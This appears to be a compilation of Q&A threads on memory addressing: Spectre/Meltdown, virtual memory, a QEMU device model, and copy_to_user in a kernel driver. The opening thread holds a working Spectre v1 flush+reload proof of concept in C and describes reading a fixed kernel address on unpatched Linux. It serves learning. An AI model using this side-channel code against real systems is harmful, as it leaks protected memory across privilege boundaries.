As part of a learning project, I've worked a bit on Spectre and Meltdown PoCs to get more comfortable with the concepts. I have managed to recover previously accessed data using cache timing, but now I'm wondering how these attacks actually read arbitrary memory from that point.
Which leads to my question: in a lot of Spectre v1/v2 examples, you can read this piece of toy code:
if (x < y) {
    z = array[x];
}
with x supposedly being equal to attacked_address - address_of_array, which will effectively lead to z getting the value at attacked_address.
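The toy code above actually omits the step that makes the leak observable: a second array access that encodes the speculatively read byte into the cache. Below is a condensed sketch of the whole flow for x86-64 with GCC/Clang; the array names, training pattern, and cycle threshold are illustrative assumptions, and real PoCs use branchless index selection and a shuffled probe order for reliability.

#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <x86intrin.h>                 /* _mm_clflush, __rdtscp (x86 only) */

#define STRIDE    4096                 /* one probe slot per page */
#define THRESHOLD 120                  /* cache-hit cutoff, machine-dependent */

unsigned array_size = 16;
uint8_t  array[16];
uint8_t  probe[256 * STRIDE];
const char *secret = "The Magic Words";
volatile uint8_t sink;

/* The victim gadget: the bounds check is bypassed speculatively, and the
 * out-of-bounds byte is encoded as which probe slot becomes cached. */
void victim(size_t x)
{
    if (x < array_size)
        sink = probe[array[x] * STRIDE];
}

int leak_byte(size_t malicious_x)
{
    int hits[256] = {0};
    for (int t = 0; t < 100; t++) {
        for (int i = 0; i < 256; i++)          /* flush every probe slot */
            _mm_clflush(&probe[i * STRIDE]);
        for (int j = 0; j < 30; j++) {
            _mm_clflush(&array_size);          /* delay the bounds check */
            for (volatile int d = 0; d < 100; d++) ;
            /* five in-bounds training calls, then one out-of-bounds call */
            victim(j % 6 ? j % 16 : malicious_x);
        }
        for (int i = 1; i < 256; i++) {        /* flush+reload: time each slot */
            unsigned aux;
            uint64_t t0 = __rdtscp(&aux);
            sink = probe[i * STRIDE];
            if (__rdtscp(&aux) - t0 < THRESHOLD)
                hits[i]++;
        }
    }
    int best = 1;                              /* slot 0 is polluted by training */
    for (int i = 2; i < 256; i++)
        if (hits[i] > hits[best]) best = i;
    return best;
}

int main(void)
{
    memset(probe, 1, sizeof probe);            /* fault the probe pages in */
    /* x = attacked_address - address_of_array, exactly as described above */
    size_t x = (size_t)(secret - (const char *)array);
    for (size_t k = 0; k < strlen(secret); k++)
        putchar(leak_byte(x + k));
    putchar('\n');
}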
In the example it's quite easy to understand, but in reality how do they even know what attacked_address looks like?
Is it a virtual address with an offset, or a physical address, and how do they manage to find where the "important memory" is located in the first place?
In the example it's quite easy to understand, but in reality how do they even know what attacked_address looks like?
You are right: Spectre and Meltdown are just possibilities, not ready-to-use attacks. But if you know an address to attack from other sources, Spectre and Meltdown are a way to get at the data, even from a browser.
Is it a virtual address with an offset, or a physical address, and how do they manage to find where the "important memory" is located in the first place?
It is indeed a virtual address, since it all happens in a user-space program. But prior to the recent kernel patches, the full kernel space was mapped into each user-space process. That was done to speed up system calls, i.e. to perform just a privilege switch rather than a full process context switch for each syscall.
So, due to that design and Meltdown, it is possible to read kernel space from an unprivileged user-space application (for example, a browser) on unpatched kernels.
In general, the easiest attack scenario is to target machines with old kernels that do not use address randomization, i.e. kernel symbols are at the same place on any machine running that specific kernel version. Basically, we run the specific kernel on a test machine, write down the "important memory addresses", and then just run the attack on a victim's machine using those addresses.
Have a look at my Spectre-based Meltdown PoC (i.e. 2-in-1): https://github.com/berestovskyy/spectre-meltdown
It is much simpler and easier to understand than the original code from the Spectre paper, and it is just 99 lines of C (including comments).
It uses the technique described above: for Linux 3.13 it simply tries to read the predefined address 0xffffffff81800040, which is the linux_proc_banner symbol located in kernel space. It runs without any privileges on different machines with kernel 3.13 and successfully reads kernel space on each machine.
It is harmless: just a tiny working PoC.
I'm curious to know what "Memory" really stands for.
When I compile and execute this code:
#include <stdio.h>

int main(void)
{
    int n = 50;
    printf("%p\n", (void *)&n);   /* %p expects a void pointer */
}
As we know, we get a Hex output like:
0x7ffeee63dabc
What does that Hex address physically stand for? Is it a part of my computer's L1 Cache? RAM? SSD?
Where can I read more about this? Any references would be helpful. Thank you.
Some Background:
I've recently picked up learning computer science again after a break of a few years (I was working in the industry as a low-code / no-code web developer) and realised there are a few gaps in my knowledge I want to colour in.
In learning C (via CS50x), I'm on the week about memory, and I realise I don't actually know what memory this refers to. The course either assumes that students already know this, or that it isn't pertinent to the course's context (it's an intro course, so abstractions make sense to avoid going down rabbit holes), but I'm curious and I'd like to chase it down to find out the answers.
computer architecture 101
In your computer there is a CPU chip and there are RAM chips.
The CPU's job is to calculate things. The RAM's job is to remember things.
The CPU is in charge. When it wants to remember something, or look up something it's remembering, it asks the RAM.
The RAM has a bunch of slots where it can store things. Each slot holds 1 byte. The slot number (not the number in the slot, but the number of the slot) is called an address. Each slot has a different address. They start from 0 and go up: 0, 1, 2, 3, 4, ... Like letterboxes on a street, but starting from 0.
The way the CPU tells the RAM which thing to remember is by using a number called an address.
The CPU can say: "Put the number 126 into slot 73224." And it can say, "Which number is in slot 97221?"
We normally write slot numbers (addresses) in hexadecimal, with 0x in front to remind us that they're hexadecimal. It's tradition.
How does the CPU know which address it wants to access? Simple: the program tells it.
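To see this from a program's point of view, here's a tiny C sketch (the variable names are just for illustration) that prints the slot numbers the program's own bytes occupy; note the addresses come out consecutive:

#include <stdio.h>

int main(void)
{
    unsigned char bytes[4] = {10, 20, 30, 40};
    /* each element lives in its own one-byte slot; %p prints the slot number */
    for (int i = 0; i < 4; i++)
        printf("slot %p holds %d\n", (void *)&bytes[i], bytes[i]);
}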
operating systems 101
An operating system's job is to keep the system running smoothly.
That doesn't happen when faulty programs are allowed to access memory that doesn't belong to them.
So the operating system decides which memory the program is allowed to access, and which memory it isn't. It tells the CPU this information.
The "Am I allowed to access this memory?" information applies in 4 kilobyte chunks called "pages". Either you can access the entire page, or none of it. That's because if every byte had separate access information, you'd need to waste half your RAM just storing the access information!
If you try to access an address in a page that the OS said you can't access, the CPU narcs to the OS, which then stops running your program.
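Because pages are 4096 bytes, any address splits into a page number and an offset within the page by plain division. A minimal sketch, using the address from the question:

#include <stdio.h>

int main(void)
{
    unsigned long long addr = 0x7ffeee63dabcULL;   /* address from the question */
    unsigned long long page_size = 4096;           /* 4 kilobytes */

    printf("page:   0x%llx\n", addr / page_size);  /* -> 0x7ffeee63d */
    printf("offset: 0x%llx\n", addr % page_size);  /* -> 0xabc */
}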
operating systems 102
Remember this shiny new "virtual memory" feature from the Windows 95 days?
"Virtual memory" means the addresses your program uses aren't the real RAM addresses.
Whenever you access an address, the CPU looks up the real address. This also uses pages. So the OS can make any "address page" go to any "real page".
These are not official terms - OS designers actually say that any "virtual page" can "map" to any "physical page".
If the OS wants a physical page but there aren't any left, it can pick one that's already used, save its data onto the disk, make a little note that it's on disk, and then it can reuse the page.
What if the program tries to access a page that's on disk? The OS lies to the CPU: it says "The program is not allowed to access this page." even though it is allowed.
When the CPU narcs to the OS, the OS doesn't stop the program. It pauses the program, finds something else to store on disk to make room, reads in the data for the page the program wants, then it unpauses the program and tells the CPU "actually, he's allowed to access this page now." Neat trick!
So that's virtual memory. The CPU doesn't know the difference between a page that's on disk, and one that's not allocated. Your program doesn't know the difference between a page that's on disk, and one that isn't. Your program just suffers a little hiccup when it has to get something from disk.
The only way to know whether a virtual page is actually stored in RAM (in a physical page), or whether it's on disk, is to ask the OS.
Virtual page numbers don't have to start from 0; the OS can choose any virtual page number it wants.
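If you do want to ask the OS, Linux exposes this through mincore(2). A small Linux-only sketch; a freshly mapped anonymous page isn't resident until it's first touched:

#define _DEFAULT_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/mman.h>

int main(void)
{
    size_t page = (size_t)sysconf(_SC_PAGESIZE);

    /* reserve one page of virtual memory, but don't touch it yet */
    unsigned char *p = mmap(NULL, page, PROT_READ | PROT_WRITE,
                            MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED)
        return 1;

    unsigned char vec;
    mincore(p, page, &vec);
    printf("before first touch: %s\n", (vec & 1) ? "in RAM" : "not in RAM");

    p[0] = 42;                  /* first touch: the OS faults the page in */
    mincore(p, page, &vec);
    printf("after first touch:  %s\n", (vec & 1) ? "in RAM" : "not in RAM");

    munmap(p, page);
}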
computer architecture 102
A cache is a little bit of memory in the CPU so it doesn't have to keep asking the RAM chip for things.
The first time the CPU wants to read from a certain address, it asks the RAM chip. Then, it chooses something to delete from its cache, deletes it, and puts the value it just read into the cache instead.
Whenever the CPU wants to read from a certain address, it checks if it's in the cache first.
Things that are in the cache are also in RAM. It's not one or the other.
The cache typically stores chunks of 64 bytes, called cache lines. Not pages!
There isn't a good way to know whether a cache line is stored in the cache or not. Even the OS doesn't know.
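You can, however, infer it by timing the access, which is exactly the trick cache side-channel attacks rely on. A small x86-only sketch; the exact cycle counts are machine-dependent, but the flushed read should be noticeably slower:

#include <stdint.h>
#include <stdio.h>
#include <x86intrin.h>          /* _mm_clflush, __rdtscp (x86 only) */

static uint64_t time_read(volatile uint8_t *p)
{
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*p;                   /* the load being timed */
    return __rdtscp(&aux) - t0;
}

int main(void)
{
    static uint8_t buf[64];     /* one cache line */

    buf[0] = 1;                 /* touch it: the line is now cached */
    printf("cached:  %llu cycles\n", (unsigned long long)time_read(buf));

    _mm_clflush(buf);           /* evict the line from every cache level */
    printf("flushed: %llu cycles\n", (unsigned long long)time_read(buf));
}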
programming language design 101
C doesn't want you to know about all this stuff.
C is a set of rules about how you can and can't write programs. The people who design C don't want to have to explain all this stuff, so they make rules about what you can and can't do with pointers, and that's the end of it.
For example, the language doesn't know about virtual memory, because not all types of computers have virtual memory. Dishwashers and microwaves have no use for it, and it would be a waste of money.
What does that Hex address physically stand for? Is it a part of my computer's L1 Cache? RAM? SSD?
The address 0x7ffeee63dabc means address 0xabc within virtual page 0x7ffeee63d. It might be on your SSD at the moment or in RAM; if you access it, then it has to come into RAM. It might also be in cache at the moment, but there's no good way to tell. The address doesn't change no matter where the data goes.
You should think of memory as an abstract mapping from addresses to values, nothing more.
Whether your actual hardware implements it as a single chunk of memory or as a complicated hierarchy of caches is not relevant until you try to optimize for very specific hardware, which you will not want to do 99% of the time.
In general, memory is anything that stores data, either temporarily or non-volatilely. Temporary memory loses its contents when the machine is turned off and is usually referred to as RAM, or simply "memory". Non-volatile memory is kept on a hard disk, flash drive, EEPROM, etc., and is usually referred to as ROM or storage.
Caches are also a type of temporary memory, but they are referred to simply as cache and are not considered part of the RAM. The RAM in your PC is also referred to as "physical memory" or "main memory".
When programming, all the variables are usually in main memory (more on this later) and are brought into the caches (L1, L2, etc.) while they are being used. But the caches are, for the most part, transparent to application developers.
Now there is another thing to mention before I answer your question. The addresses of a program are not necessarily addresses in physical memory: they are translated from "virtual addresses" to "physical addresses" by an MMU (memory management unit) or a similar CPU feature, which the OS controls. The MMU exists for many reasons; two of them are to hide and protect the OS's memory and other applications' memory from stray accesses by a program. This way a program can neither read nor alter the OS's or another program's memory.
Further, when there is not enough RAM to hold all the memory that applications request, the OS can store some of that memory in non-volatile storage. Because of virtual addresses, a program cannot easily tell whether its memory is actually in RAM or in storage. This way programs can allocate a lot more memory than there is RAM. It is also why programs become very slow when they consume a lot of memory: it takes a long time to bring the data from storage back into main memory.
So, the address that you are printing is most likely a virtual address.
You can read something about those topics here:
https://en.wikipedia.org/wiki/Memory_management_(operating_systems)
https://en.wikipedia.org/wiki/Virtual_memory
From the C standard's point of view, memory is simply storage for objects. How it works and how it is organized is left to the implementation.
Even printing pointers is meaningless from the C point of view (though it can be informative and interesting from the implementation's point of view).
If your code is running under a modern operating system [1], pointer values almost certainly correspond to virtual memory addresses, not physical addresses. There's a virtual memory system that maps the virtual address your code sees to a physical address in main memory (RAM), but as pages get swapped in and out, that physical address may change.
[1] For desktops, anything newer than the mid-'90s. For mainframes and minis, almost anything newer than the mid-'60s.
Is it a part of my computer's L1 Cache? RAM? SSD?
The short answer is RAM. This address is usually associated with a unique location inside your RAM. The long answer is, well, it depends!
Most machines today have a Memory Management Unit (MMU) which sits in-between the CPU and the peripherals attached to it, translating 'virtual' addresses seen by a program to real ones that actually refer to something physically attached to the bus. Setting up the MMU and allotting memory regions to your program is generally the job of the Operating System. This allows for cool stuff like sharing code/data with other running programs and more.
So the address that you see here may not be the actual physical address of a RAM location at all. However, with the help of the MMU, the OS can accurately and quickly map this number to an actual physical memory location somewhere in the RAM and allow you to store data in RAM.
Now, any accesses to the RAM may be cached in one or more of the available caches. Alternatively, it could happen that your program memory temporarily gets moved to disk (swapfile) to make space for another program. But all of this is completely automatic and transparent to the programmer. As far as your program is concerned, you are directly reading from or writing to the available RAM and the address is your handle to the unique location in RAM that you are accessing.
I'm modeling a particular evaluation board, which has a LEON3 processor and several banks of MRAM mapped to specific addresses. My goal is to start qemu-system-sparc using my bootloader ELF and then jump to the base address of an MRAM bank to begin executing the bare-metal programs stored there. To this end, I have been able to run my bootloader successfully and jump to the first instruction, but QEMU immediately stops and exits without reporting any error or trap. I can also run the bare-metal programs in isolation by passing them in ELF format as a kernel to qemu-system-sparc.
Short version: Is there a canonical way to set up a device such that code can be executed from it directly? What steps do I need to take when compiling that code to allow it to execute correctly?
I modeled the MRAM as a device with a MemoryRegion, along with the appropriate read and write operations to expose a heap-allocated array with my program. In my board code (modified version of qemu/hw/sparc/leon3.c), writes to the MRAM address are mapped to the MemoryRegion of the device. Using printfs, I am reporting reads and writes in the style of the unimplemented device (qemu/hw/misc/unimp.c), and I have verified that I am reading and writing to the device correctly.
Unfortunately, this did not work for running code from the device. I can see the read immediately after the bootloader jumps to the base address of my device, but the instruction that is read doesn't actually do anything. (The bootloader uses a void function pointer tied to the address of the MRAM device to induce the jump.)
Another approach I tried was creating an alias to my device starting at address 0: I thought perhaps my binary had all its addresses set relative to zero, so that by mapping accesses to addresses [0, MRAM_SIZE) as an alias to my device's base address, the code would end up reading the corresponding instructions in the device MemoryRegion.
This approach failed an assert in memory.c:
static void memory_region_add_subregion_common(MemoryRegion *mr,
                                               hwaddr offset,
                                               MemoryRegion *subregion)
{
    assert(!subregion->container);
    subregion->container = mr;
    subregion->addr = offset;
    memory_region_update_container_subregions(subregion);
}
What do I need to do to coerce QEMU to execute the code in my MRAM device? Do I need to produce a binary with absolute addresses?
Older versions of QEMU were simply unable to handle execution from anything other than RAM or ROM, and attempting to do so would give a "qemu: fatal: Trying to execute code outside RAM or ROM" error. QEMU 3.1 and later fixed this limitation, and now can execute code from anywhere -- though execution from a device will be much much slower than executing from RAM.
You mention that you "modeled the MRAM as a device with a MemoryRegion, along with the appropriate read and write operations to expose a heap-allocated array". This sounds like the wrong approach -- it will work, but it will be very slow. If the MRAM appears to the guest as being like RAM, then model it as RAM (i.e. with a RAM MemoryRegion). If it's like RAM for reading but writes need to do something other than just write to the memory (or need to do that some of the time), then model it using a "romd" region, the same way the existing pflash devices do. Nonetheless, modelling it as a device with pure read and write functions should work; it'll just be horribly slow.
The assertion you've run into is the one that says "you can't put a memory region into two things at once" -- the 'subregion' you've passed in is already being used somewhere else, but you've tried to put it into a second container. If you have a MemoryRegion that you need to have appear in two places in the physical memory map, then you need to: create the MemoryRegion; create an alias MemoryRegion that aliases the real one; map the actual MemoryRegion into one place; map the alias into the other. There are plenty of examples of this in existing board models in QEMU.
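As a rough sketch, that recipe might look like this inside a board's init function (MRAM_BASE and MRAM_SIZE are placeholders for your board's values, and this assumes the MRAM is modelled as plain RAM as suggested above):

MemoryRegion *sysmem = get_system_memory();
MemoryRegion *mram   = g_new(MemoryRegion, 1);
MemoryRegion *alias  = g_new(MemoryRegion, 1);

/* model the MRAM as RAM so the guest can execute from it at full speed */
memory_region_init_ram(mram, NULL, "mram", MRAM_SIZE, &error_fatal);
memory_region_add_subregion(sysmem, MRAM_BASE, mram);

/* a region may only live in one container, so its second appearance
 * in the address map must be an alias of the first */
memory_region_init_alias(alias, NULL, "mram.alias", mram, 0, MRAM_SIZE);
memory_region_add_subregion(sysmem, 0x00000000, alias);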
More generally, you need to figure out what the evaluation board hardware actually is, and then model that. If the eval board has the MRAM visible at multiple physical addresses, then yes, use an alias MR. If it doesn't, then the problem is somewhere else and you need to figure out what's actually happening, not try to bodge around it with aliases that don't exist on the real hardware. QEMU's debug logging (various -d suboptions, plus -D file to log to a file) can be useful for checking what the emulated CPU is really doing in this early bootup phase -- but watch out as the logs can be quite large and they are sometimes tricky to interpret unless you know a little about QEMU internals.
The following is an excerpt from my simple driver code.
int vprobe_ioctl(struct file *filep, unsigned int cmd, void *UserInp)
{
    switch (cmd) {
    case IOCTL_GET_MAX_PORTS:
        *(int *)UserInp = TotalPorts;   /* direct write through a user pointer */
#if ENABLED_DEBUG
        printk("Available ports: %u\n", TotalPorts);
#endif
        break;
    }
    return 0;
}
I was not aware of the copy_to_user function, which should be used when writing to user-space memory; the code accesses the user address directly. Still, I do not get any kernel crash on my development system (x86_64 architecture), and it works as expected.
But I sometimes see a kernel crash when I insert the .ko file on some other x86_64 machines. So I replaced the direct access with copy_to_user, and it works.
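For reference, a sketch of what the fixed handler might look like, assuming it is wired up as an unlocked_ioctl (which passes the user pointer as an unsigned long); the identifiers are taken from the question:

static long vprobe_ioctl(struct file *filep, unsigned int cmd, unsigned long arg)
{
    switch (cmd) {
    case IOCTL_GET_MAX_PORTS:
        /* copy_to_user validates the user pointer and survives page faults;
         * it returns the number of bytes that could NOT be copied */
        if (copy_to_user((int __user *)arg, &TotalPorts, sizeof(TotalPorts)))
            return -EFAULT;
        break;
    default:
        return -ENOTTY;
    }
    return 0;
}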
Could anyone please explain,
i) How does direct access to a user address work?
ii) Why do I see a kernel crash on some systems while it works well on others? Is there some kernel configuration mismatch between the systems that lets the kernel access the user process's virtual address directly?
Note: all the systems I used have the same OS and kernel (the same image, generated through kickstart), so there should be no differences between them.
Thanks in advance.
It would be interesting to see the crash. What follows is an assumption based on my knowledge of how the memory works.
User-space memory is virtual. That means a given process address X is backed by some physical memory: a memory page that is currently allocated to your process. copy_to_user first checks that the given memory really belongs to the process, along with other security checks. Besides that, there are mapping issues.
The kernel has its own address space and needs to map virtual to physical addresses itself, with the help of the MMU (this differs per architecture). On x86 the mapping between kernel virtual and user virtual addresses is 1:1 (with various caveats); on other systems this is not always true.
I was reading a paragraph from "The Linux Kernel Module Programming Guide" and I have a couple of doubts about the following paragraph.
The reason for copy_from_user or get_user is that Linux memory (on
Intel architecture, it may be different under some other processors)
is segmented. This means that a pointer, by itself, does not reference
a unique location in memory, only a location in a memory segment, and
you need to know which memory segment it is to be able to use it.
There is one memory segment for the kernel, and one for each of the
processes.
However, it is my understanding that Linux uses paging instead of segmentation, and that virtual addresses at and above 0xc0000000 have the kernel mapped in.
1. Do we use copy_from_user in order to accommodate older kernels?
2. Do current Linux kernels use segmentation in any way at all? If so, how?
3. If (1) is not true, are there any other advantages to using copy_from_user?
Yeah, I don't like that explanation either. The details are essentially correct in a technical sense (see also Why does Linux on x86 use different segments for user processes and the kernel?), but, as you say, Linux typically maps memory so that kernel code can access it directly, so I don't think that's a good explanation for why copy_from_user etc. actually exist.
IMO, the primary reason for using copy_from_user / copy_to_user (and friends) is simply that there are a number of things to be checked (dangers to be guarded against), and it makes sense to put all of those checks in one place. You wouldn't want every place that needs to copy data in and out from user-space to have to re-implement all those checks. Especially when the details may vary from one architecture to the next.
For example, it's possible that a user-space page is actually not present when you need to copy to or from that memory, and hence it's important that the call be made from a context that can accommodate a page fault (and hence can be put to sleep).
Also, user-space data pointers need to be checked carefully to ensure that they actually point to user-space and that they point to data regions, and that the copy length doesn't wrap beyond the end of the valid regions, and so forth.
Finally, it's possible that user-space actually doesn't share the same page mappings with the kernel. There used to be a linux patch for 32-bit x86 that made the complete 4G of virtual address space available to user-space processes. In that case, kernel code could not make the assumption that a user-space pointer was directly accessible, and those functions might need to map individual user-space pages one at a time in order to access them. (See 4GB/4GB Kernel VM Split)
I am currently taking a course in Operating Systems and I came across address virtualization. I will give a brief about what I know and follow that with my question.
Basically, the CPU (in modern microprocessors) generates virtual addresses, and an MMU (memory management unit) takes care of translating those virtual addresses to their corresponding physical addresses in RAM. The professor's example of why there is a need for virtualization: You compile a C program. You run it. And then you compile another C program. You try to run it but the resident running program in memory prevents loading a newer program even when space is available.
From my understanding, with no virtualization, if the compiler generates two physical addresses that are the same, the second won't run because it thinks there isn't enough space for it. When we virtualize this, as in the CPU generating only virtual addresses, the MMU will deal with this "collision" and find a spot for the other program in RAM. (Our professor gave the example of the MMU being a mapping table that takes a virtual address and maps it to a physical address.) I thought that idea was very similar to resolving collisions in a hash table.
Could I please get some input on my understanding? Any further clarification is appreciated.
Could I please get some input on my understanding? Any further clarification is appreciated.
Your understanding is roughly correct.
Clarifications:
The data structures are nothing like a hash table.
If anything, the data structures are closer to a B-tree, but even there, there are important differences. It is really closest to a (Java) N-dimensional array that has been sparsely allocated (see the sketch after this list).
It maps pages rather than complete virtual / physical addresses. (A complete address is a page address plus an offset within the page.)
There is no issue with collisions. At any point in time, the virtual-to-physical mappings for all users / processes give a one-to-one mapping from (process id + virtual page) to either a physical RAM page or a disk page (or both).
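To make the sparsely allocated N-dimensional array analogy concrete, here is a small sketch that splits a virtual address the way x86-64's four-level page tables do; each 9-bit field indexes one "dimension", and the bottom 12 bits are the offset within the page:

#include <stdio.h>

int main(void)
{
    unsigned long long va = 0x7ffeee63dabcULL;   /* an example user address */

    /* x86-64 four-level paging: 9 bits of index per level, 12-bit offset */
    printf("level-4 (PML4) index: %llu\n", (va >> 39) & 0x1ff);
    printf("level-3 (PDPT) index: %llu\n", (va >> 30) & 0x1ff);
    printf("level-2 (PD)   index: %llu\n", (va >> 21) & 0x1ff);
    printf("level-1 (PT)   index: %llu\n", (va >> 12) & 0x1ff);
    printf("page offset:          0x%llx\n", va & 0xfff);
}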
The reasons we use virtual memory are:
process isolation; i.e. one process can't see or interfere with another process's memory
simplifying application writing; i.e. each process thinks it has a contiguous set of memory addresses, and the same set each time (to a first approximation...)
simplifying compilation, linking, and loading; i.e. there is no need to "relocate" code at compile time or run time to take account of other programs
to allow the system to accommodate more processes than it has physical RAM for ... though this comes with potential risks and performance penalties.
I think you have a fundamental misconception about what goes on in an operating system in regard to memory.
(1) You are describing logical memory, not virtual memory. Virtual memory refers to the use of disk storage to simulate memory. Unmapped pages of logical memory get mapped to disk space.
Sadly, the terms logical memory and virtual memory get conflated, but they are distinct concepts, and the distinction is becoming increasingly important.
(2) Programs run in a PROCESS. A process only runs one program at a time (in Unix, each process generally runs only one program in its life, or two if you count the cloned caller).
In modern systems each process gets a logical address space (sequential addresses) that can be mapped to physical locations or to no location at all. Generally, part of that logical address space is mapped to a kernel area that is shared by all processes. The logical address space is created with the process: no address space, no process.
In a 32-bit system, addresses 0-7FFFFFFF might be user addresses that are (generally) mapped to unique physical locations, while 80000000-FFFFFFFF might be mapped to a system address space that is the same for all processes.
(3) Logical memory management primarily serves as a means of security; not as a means for program loading (although it does help in that regard).
(4) This example makes no sense to me:
You compile a C program. You run it. And then you compile another C program. You try to run it but the resident running program in memory prevents loading a newer program even when space is available.
You are ignoring the concept of a PROCESS. A process can only have one program running at a time. In systems that do permit running programs serially within the same process (e.g., VMS), the executing program prevents loading another program (or the loading of another program causes the termination of the running one). It is not a memory issue.
(5) This is not correct at all:
From my understanding, with no virtualization, if the compiler generates two physical addresses that are the same, the second won't run because it thinks there isn't enough space for it. When we virtualize this, as in the CPU generating only virtual addresses, the MMU will deal with this "collision" and find a spot for the other program in RAM.
The MMU does not deal with collisions. The operating system sets up tables that define the logical address space when the process starts. Logical memory has nothing to do with hash tables.
When a program accesses logical memory, the rough sequence is (sketched in code after the list):
1. Break down the address into a page and an offset within the page.
2. Does the page have a corresponding entry in the page table? If not, FAULT.
3. Is the entry in the page table valid? If not, FAULT.
4. Does the page table entry allow the type of access (read/write/execute) requested in the current operating mode (kernel/user/...)? If not, FAULT.
5. Does the entry map to a physical page? If not, PAGE FAULT (go load the page from disk, i.e. virtual memory, and try again).
6. Access the physical memory referenced by the page table entry.
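Here is that sequence as a schematic C sketch. Everything in it is invented for illustration: the pte_t layout and the fault()/page_fault() helpers are hypothetical stand-ins, not real OS or MMU code.

#include <stddef.h>

enum { PAGE_SHIFT = 12, PAGE_MASK = (1 << PAGE_SHIFT) - 1 };
enum { PERM_R = 1, PERM_W = 2, PERM_X = 4 };

typedef struct {
    int           valid;    /* entry describes a real mapping           */
    int           present;  /* page is in RAM rather than paged to disk */
    int           perms;    /* allowed PERM_R | PERM_W | PERM_X bits    */
    unsigned long frame;    /* physical page number, when present      */
} pte_t;

extern void fault(const char *why);          /* kill the program           */
extern void page_fault(unsigned long vpn);   /* load from disk, then retry */

unsigned long translate(const pte_t *page_table, size_t table_len,
                        unsigned long vaddr, int want)
{
    unsigned long vpn = vaddr >> PAGE_SHIFT;    /* 1. page + offset          */
    unsigned long off = vaddr & PAGE_MASK;

    if (vpn >= table_len)                       /* 2. no entry at all        */
        fault("no page table entry");
    const pte_t *e = &page_table[vpn];

    if (!e->valid)                              /* 3. entry not valid        */
        fault("invalid entry");
    if ((e->perms & want) != want)              /* 4. access type forbidden  */
        fault("protection violation");
    if (!e->present)                            /* 5. paged out: load, retry */
        page_fault(vpn);

    return (e->frame << PAGE_SHIFT) | off;      /* 6. physical address       */
}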